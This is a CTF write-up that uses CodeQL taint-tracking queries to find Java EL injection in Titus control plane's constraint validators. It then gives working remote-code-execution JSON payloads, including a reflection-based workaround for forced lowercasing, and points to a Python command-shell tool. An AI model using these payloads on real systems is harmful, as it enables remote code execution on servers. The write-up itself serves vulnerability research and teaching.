Submission for the GitHub Security Lab CTF 4: CodeQL and Chill - The Java Edition
UPDATE: This entry won the first prize 🎉
Table of Contents -
- Introduction
- Step 1: Data Flow and Taint Tracking Analysis
- Step 2: Second Issue
- Step 3: Errors and Exceptions
- Step 4: Exploit and Remedition
- Ending remarks and Feedback
The challenge introduction aptly summarizes the issue: user controlled data being passed into the Bean Validation library function ConstraintValidatorContext.buildConstraintViolationWithTemplate
which supports Java EL Expressions. Hence, remote code execution. That might seem to be the end of the issue, but it isn't. Getting an RCE wasn't as easy as just passing an EL expression. Some issues like lowercasing of the user input stopped us from getting the exploit. In this report I explain how I found specific user controlled data which flows into the target function using CodeQL, assess what requirements we have for a successful remote code execution and finally I present the exploit.
An important part of finding the exploit is finding where all the user controlled data can come from. A good starting point is explained in the challenge page itself - first formal parameter to the function isValid
.
So the predicate to this is quiet straight forward
class TypeConstraintValidator extends GenericInterface {
TypeConstraintValidator() { hasQualifiedName("javax.validation", "ConstraintValidator") }
}
predicate isSource(DataFlow::Node source) {
exists(Method m, ParameterizedInterface p |
source.asParameter() = m.getParameter(0) and
m.hasName("isValid") and
m.getDeclaringType().hasSupertype(p) and
p.getSourceDeclaration() instanceof TypeConstraintValidator
)
}
In this snippet, class TypeConstraintValidator
the interface javax.validation.ConstraintValidator
. To explain the query, we want such sources for which, there exists such method whose first paramenter is the node itself, and name of the method is isValid
and the method is a part of a class which extends javax.validation.ConstraintValidator
.
We see 8 results, but 2 out of these 8 don't override the isValid
provided by the interface javax.validation.ConstraintValidator
. We filter them out using this following query (and using better variable names) -
predicate isSource(DataFlow::Node source) {
exists(Method isValid, ParameterizedInterface originalConstrainValidator, Method originalIsValid |
source.asParameter() = isValid.getParameter(0) and
isValid.hasName("isValid") and
isValid.getDeclaringType().hasSupertype(originalConstrainValidator) and
originalConstrainValidator.getSourceDeclaration() instanceof TypeConstraintValidator and
originalIsValid.hasName("isValid") and
originalIsValid.getDeclaringType() = originalConstrainValidator and
isValid.overrides(originalIsValid)
)
}
NOTE: I attempted the bonus part too, it's writeup is present in the file bonus.md. Do check it out if the submissions are close enough!
As we know where the actual vulnerability exists, i.e. buildConstraintViolationWithTemplate
, writing the sink was trivial.
predicate isSink(DataFlow::Node sink) {
exists(MethodAccess sinkFunction, Interface constraintValidatorContext |
sink.asExpr() = sinkFunction.getArgument(0) and
sinkFunction.getMethod().hasName("buildConstraintViolationWithTemplate") and
sinkFunction.getQualifier().getType() = constraintValidatorContext and
constraintValidatorContext.hasQualifiedName("javax.validation", "ConstraintValidatorContext")
)
}
That is, we want all nodes which are first argument to a method call whose name is buildConstraintViolationWithTemplate
and it should be called by a qualifier of type javax.validation.ConstraintValidatorContext
.
We have our sources and sinks ready. We now run the full taint tracking query to find all the taint flow paths.
/**
* @kind path-problem
*/
import java
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PathGraph
class TypeConstraintValidator extends GenericInterface {
TypeConstraintValidator() { hasQualifiedName("javax.validation", "ConstraintValidator") }
}
class MyTaintTrackingConfig extends TaintTracking::Configuration {
MyTaintTrackingConfig() { this = "MyTaintTrackingConfig" }
override predicate isSource(DataFlow::Node source) {
exists(Method isValid, ParameterizedInterface originalConstrainValidator, Method originalIsValid |
source.asParameter() = isValid.getParameter(0) and
isValid.hasName("isValid") and
isValid.getDeclaringType().hasSupertype(originalConstrainValidator) and
originalConstrainValidator.getSourceDeclaration() instanceof TypeConstraintValidator and
originalIsValid.hasName("isValid") and
originalIsValid.getDeclaringType() = originalConstrainValidator and
isValid.overrides(originalIsValid)
)
}
override predicate isSink(DataFlow::Node sink) {
exists(MethodAccess sinkFunction, Interface constraintValidatorContext |
sink.asExpr() = sinkFunction.getArgument(0) and
sinkFunction.getMethod().hasName("buildConstraintViolationWithTemplate") and
sinkFunction.getQualifier().getType() = constraintValidatorContext and
constraintValidatorContext.hasQualifiedName("javax.validation", "ConstraintValidatorContext")
)
}
}
from MyTaintTrackingConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "Custom constraint error message contains unsanitized user data"
And as mentioned in the challenge page, I get 0 results.
To debug why we get no result, we use Partial Flow analysis. We know that we have a vulnerability in the file SchedulingContraintSetValidator.java
, so we set the source to the formal parameter of this method.
/**
* @kind path-problem
*/
import java
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PartialPathGraph
class TypeConstraintValidator extends GenericInterface {
TypeConstraintValidator() { hasQualifiedName("javax.validation", "ConstraintValidator") }
}
class MyTaintTrackingConfig extends TaintTracking::Configuration {
MyTaintTrackingConfig() { this = "MyTaintTrackingConfig" }
override predicate isSource(DataFlow::Node source) {
exists(Method isValid, ParameterizedInterface originalConstrainValidator, Method originalIsValid |
source.asParameter() = isValid.getParameter(0) and
isValid.hasName("isValid") and
isValid.getDeclaringType().hasSupertype(originalConstrainValidator) and
originalConstrainValidator.getSourceDeclaration() instanceof TypeConstraintValidator and
originalIsValid.hasName("isValid") and
originalIsValid.getDeclaringType() = originalConstrainValidator and
isValid.overrides(originalIsValid)
)
}
override predicate isSink(DataFlow::Node sink) {
exists(MethodAccess sinkFunction, Interface constraintValidatorContext |
sink.asExpr() = sinkFunction.getArgument(0) and
sinkFunction.getMethod().hasName("buildConstraintViolationWithTemplate") and
sinkFunction.getQualifier().getType() = constraintValidatorContext and
constraintValidatorContext.hasQualifiedName("javax.validation", "ConstraintValidatorContext")
)
}
}
from MyTaintTrackingConfig cfg, DataFlow::PartialPathNode source, DataFlow::PartialPathNode sink
where
cfg.hasPartialFlow(source, sink, _) and
exists(Method m |
source.getNode().asParameter() = m.getParameter(0) and
m.getParameter(0).getType().hasName("Container")
)
select sink, source, sink, "Partial flow from unsanitized user data"
In the output, we see that flow stops at the return statement of the getters like getSoftConstraints
and getHardConstraints
.
As we see in the last step, the code doesn't propagate through the getters. My best bet why this happens is because getters not always point to tainted data. They often point to some static variables, which are not tainted.
We need to step through the getters as explained in the last step. For this, we add an addition step where we step from a method access to it's qualifier. As suggested in the challenge, we extend TaintTracking::AdditionalTaintStep
.
class CustomStepper extends TaintTracking::AdditionalTaintStep {
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
exists(MethodAccess callToGetter, GetterMethod getterMethod |
succ.asExpr() = callToGetter and
pred.asExpr() = callToGetter.getQualifier() and
callToGetter.getCallee() = getterMethod
)
}
}
We restrict our step only through the getter methods, not through general methods. Note that we can also step through only the getSoftConstraints
and getHardConstraints
but it is good idea to first start with all getters so that we atleast not miss a case. In the output we see that
We don't step through keySet()
method. So we must step through this method too.
class CustomStepper extends TaintTracking::AdditionalTaintStep {
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
exists(MethodAccess ma, GetterMethod m |
succ.asExpr() = ma and
pred.asExpr() = ma.getQualifier() and
ma.getCallee() = m
) or
exists(MethodAccess callToMethod |
succ.asExpr() = callToMethod and
pred.asExpr() = callToMethod.getQualifier() and
callToMethod.getMethod().getName() = "keySet"
)
}
}
This time, the flow stops at the HashSet Constructor.
We just join the two conditions, i.e. through getters and through constructors.
class CustomStepper extends TaintTracking::AdditionalTaintStep {
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
exists(MethodAccess ma, GetterMethod m |
succ.asExpr() = ma and
pred.asExpr() = ma.getQualifier() and
ma.getCallee() = m
) or
exists(MethodAccess callToMethod |
succ.asExpr() = callToMethod and
pred.asExpr() = callToMethod.getQualifier() and
callToMethod.getMethod().getName() = "keySet"
) or
exists(ConstructorCall callToConstructor |
succ.asExpr() = callToConstructor and
callToConstructor.getArgument(0) = pred.asExpr() and
callToConstructor.getConstructedType().getErasure().(Class).hasQualifiedName("java.util", "HashSet")
)
}
}
Hurray 🎉! We reached our final destination function. We have fixed the steps for the SchedulingConstraintSetValidator.java
file. Other files to go!
To find the issue in the file SchedulingConstraintValidator.java
, we use the same configuration but with modified query
from MyTaintTrackingConfig cfg, DataFlow::PartialPathNode source, DataFlow::PartialPathNode sink
where
cfg.hasPartialFlow(source, sink, _) and
exists(Method m |
source.getNode().asParameter() = m.getParameter(0) and
m.getDeclaringType().getName() = "SchedulingConstraintValidator"
)
select sink, source, sink, "Partial flow from unsanitized user data"
The flow stops at keySet()
call. We need to make it step through stream()
, map(...)
and collect(...)
.
class CustomStepper extends TaintTracking::AdditionalTaintStep {
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
exists(MethodAccess callToGetter, GetterMethod getterMethod |
succ.asExpr() = callToGetter and
pred.asExpr() = callToGetter.getQualifier() and
callToGetter.getCallee() = getterMethod
) or
exists(MethodAccess callToMethod |
succ.asExpr() = callToMethod and
pred.asExpr() = callToMethod.getQualifier() and
(callToMethod.getMethod().getName() in ["keySet", "stream", "map", "collect"] )
) or
exists(ConstructorCall callToConstructor |
succ.asExpr() = callToConstructor and
callToConstructor.getArgument(0) = pred.asExpr() and
callToConstructor.getConstructedType().getErasure().(Class).hasQualifiedName("java.util", "HashSet")
)
}
}
Our flow reaches the target function 🎉
As stated in the challenge, we have to make a custom step such that if we see a code like this
try {
parse(tainted);
} catch (Exception e) {
sink(e.getMessage())
}
we should step from tainted
to e.getMessage()
, subject to some conditions like the function that the tainted
variable/expression is passed into should throw a throwable which can be caught by the respective catch clause, the message should be written by the successor expression (using methods like getMessage()
). So the query I could write is this -
class TryCatchStepper extends TaintTracking::AdditionalTaintStep {
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
exists(TryStmt t, CatchClause c, MethodAccess throwingCall, MethodAccess errorWriter |
// connect try and catch
c.getTry() = t and
// in catch, the method access would be the successor...
errorWriter = succ.asExpr() and
// restricting to those methods that write something
(
errorWriter.getMethod().getName() in [
"getMessage", "getStackTrace",
"getSuppressed", "toString",
"getLocalizedMessage" ] or
errorWriter.getMethod().getName().prefix(3) = "get" or
errorWriter.getMethod() instanceof GetterMethod
) and
// and it's qualifier should be the error variable.
c.getVariable().getAnAccess() = errorWriter.getQualifier() and
// predecessor would be an argument of a method access...
throwingCall.getAnArgument() = pred.asExpr() and
// which is contained in the try statement
throwingCall.getEnclosingStmt().getParent*() = t.getBlock() and
// and the method should throw some subtype of the caught clause type
throwingCall.getMethod().getAThrownExceptionType().getASupertype*() = c.getACaughtType() and
// because it shows so many false positives.
not pred.asExpr() instanceof Literal
)
}
}
(I admit that errorWriter.getMethod().getName().prefix(3) = "get"
is too general, but it helps when you don't know the inner implementation of the getter. Also, we can make it specific to our case later according to our project)
As challenge states, I couldn't get any additional paths due to this addition. But on quick evaluation I get completely right results.
Final query (without bonus part) is available in the file .
First step towards a successful exploit is setting up a development environment. I set up the project on Docker using the docker-compose.yml
and tweaked the Dockerfiles to fire up debugging in IntelliJ IDEA.
First glance at the files SchedulingConstraintValidator.java
and SchedulingConstraintSetValidator.java
suggest that the keys of the dictonaries are passed into the template builder function. That's were our EL expression will go.
A neat data model for Titus can be found here. It clearly shows that softConstraints
and hardConstraints
are inside the class Container
and an instance of class is made under JobDescriptor
. So, I make a reasonable guess that we can tweak the JobDescriptor object while creating a job to get an RCE. In the main readme file of titus-control-plane, under the section (here) they have provided the basic curl request to submit a job. We need to just add the keys softConstraints
and hardConstraints
to the data payload. A very basic payload should be:
{
"applicationName": "myApp",
"owner": {
"teamEmail": "[email protected]"
},
"container": {
"resources": {
"cpu": 1,
"memoryMB": 128,
"diskMB": 128,
"networkMbps": 1
},
"securityProfile": {"iamRole": "test-role", "securityGroups": ["sg-test"]},
"image": {
"name": "ubuntu",
"tag": "xenial"
},
"softConstraints": {
"constraints": {
"#{6*9}": "lol"
}
},
"hardConstraints": {
"constraints": {
"#{6*9}": "lol"
}
}
},
"service": {
"capacity": {
"min": 1,
"max": 1,
"desired": 1
},
"retryPolicy": {
"immediate": {
"retries": 10
}
}
}
}
We see a successful response -
{
"statusCode": 400,
"message": "Invalid Argument: {Validation failed: 'field: 'container.softConstraints', description: 'Unrecognized constraints [54]', type: 'HARD''}, {Validation failed: 'field: 'container.hardConstraints', description: 'Unrecognized constraints [54]', type: 'HARD''}, {Validation failed: 'field: 'container', description: 'Soft and hard constraints not unique. Shared constraints: [54]', type: 'HARD''}"
}
Things get interesting when we send an actual exploit, i.e we send the EL Expression #{''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("touch /tmp/hello")')}
{
"statusCode": 500,
"message": "Unexpected error: HV000149: An exception occurred during message interpolation"
}
We open our debugger, and we find that when creating a job, first individual constraints are validated (using isValid
function in SchedulingConstraintValidator.java
file) to see if valid keys are sent, then validation for the complete set is done to see if both constraint sets dont contain anything common.
As the validation is done inside SchedulingConstraintValidator.java
file first, we see that in the isValid
function:
Set<String> namesInLowerCase = value.keySet().stream().map(String::toLowerCase).collect(Collectors.toSet());
This is why we get 500. The complete EL expression is converted to lowercase, i.e
#{''.class.forname('javax.script.scriptenginemanager').newinstance().getenginebyname('js').eval('java.lang.runtime.getruntime().exec("touch /tmp/hello")')}
which should obviously error because Java doesn't know any class by name "javax.script.scriptenginemanager". Even though this lowercasing doesn't happen in SchedulingConstraintSetValidator.java
, but the code errors before reaching there.
So we now need to forge an EL expression such that all the letters in the code are in lowercase (which is tough, because Java inherently uses camel-case).
For achieving this, we use a.class.methods[*].invoke(a, args...)
to invoke any method, instead of invoking them by a.methodCanContainCapitalLetters(args...)
. Only thing we need to do is to find at what index of a.class.methods
does the function we need lie. We can also use 'a'.replace('a', 83)
to print "S" and other such strings.
The below table contains some of the examples,
Required Code | Payload |
---|---|
''.class.forName(x) |
''.class.class.methods[0].invoke(''.class, x) |
''.class.forName('javax.script.ScriptEngineManager') |
''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager') |
''.class.forName('javax.script.ScriptEngineManager').newInstance() |
''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')) |
''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js') |
''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')).class.methods[1].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')), 'js') |
Continuing such translation, I managed to run ''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').compile('java.lang.Runtime.getRuntime().exec("touch /tmp/hello")').eval()
{
"applicationName": "myApp",
"owner": {
"teamEmail": "[email protected]"
},
"container": {
"resources": {
"cpu": 1,
"memoryMB": 128,
"diskMB": 128,
"networkMbps": 1
},
"securityProfile": {"iamRole": "test-role", "securityGroups": ["sg-test"]},
"image": {
"name": "ubuntu",
"tag": "xenial"
},
"softConstraints": {
},
"hardConstraints": {
"constraints": {
"#{''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')).class.methods[1].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')), 'js').class.methods[7].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')).class.methods[1].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')), 'js'), 'print(1);').class.methods[3].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')).class.methods[1].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')), 'js').class.methods[7].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')).class.methods[1].invoke(''.class.class.methods[14].invoke(''.class.class.methods[0].invoke(''.class, 'javax.script.' + 'a'.replace('a', 83) + 'cript' + 'a'.replace('a', 69) + 'ngine' + 'a'.replace('a', 77) + 'anager')), 'js'), 'java.lang.' + 'a'.replace('a', 82) + 'untime.get' + 'a'.replace('a', 82) + 'untime().exec(\"touch /tmp/pwn\")')) + ''}": "lol"
}
}
},
"service": {
"capacity": {
"min": 1,
"max": 1,
"desired": 1
},
"retryPolicy": {
"immediate": {
"retries": 10
}
}
}
}
🎉
But this payload contains a particular caveat. Index for a particular function changes with different boots. This happens generally for the methods with multiple overloads, like compile
function which have overloads for both String
and Reader
. Hence we need to find the index first. I observed the change of index from 7 to 6. So it's important to first find at what indexes our desired functions are, then we can execute our code. But compile
doesn't contain capital letters (I forgot this :p), this problem doesn't pose that much problem for us.
A more refined version of this payload is present in this file (if you need to see only json, see this file) but the caveat is still present there. I never experienced a problem, but as we still are using indexes, problem can occur. Best way to handle this is by making a loop of all indexes and fetch the method's signature and see at which index you see the required method.
A python project where you can run a complete shell (like in SSH) is present here.
Dependencies other than that for Titus:
- Python 3
Steps:
- Setup titus-control-plane at commit 8a8bd4c at default ports (7001).
- Change directory to
titus-shell/
in this repository. - Install the package dependencies (in a virtual environment maybe) using
pip3 install -r requirements.txt
- Run
python3 shell.py
to start the shell. - Any command you enter would run on the
gateway
container of titus.
If you don't wish to run a shell, just copy the contents of the refined.sh file and paste it to your shell. You will see that a file /tmp/pwn
is made in the gateway
container.
Please note that this is a sort of shell, not a complete shell. So shell builtins (like cd) and redirections (echo abc > a.txt) won't work.
Running the same query on latest commit on LGTM.com (link - https://lgtm.com/query/3543348055529973809/) gives me no alerts!
This was my first use of CodeQL and must say, writing queries was not a pain at all because of the autocomplete feature, thumbs up to that! But the engine takes up a lot of temporary space on laptop, and I happened to be almost running out of space on my laptop. I feel CodeQL is a powerful tool, and I am planning to perform static analysis on firefox after this, thanks to creators of this awesome tool! Cheers!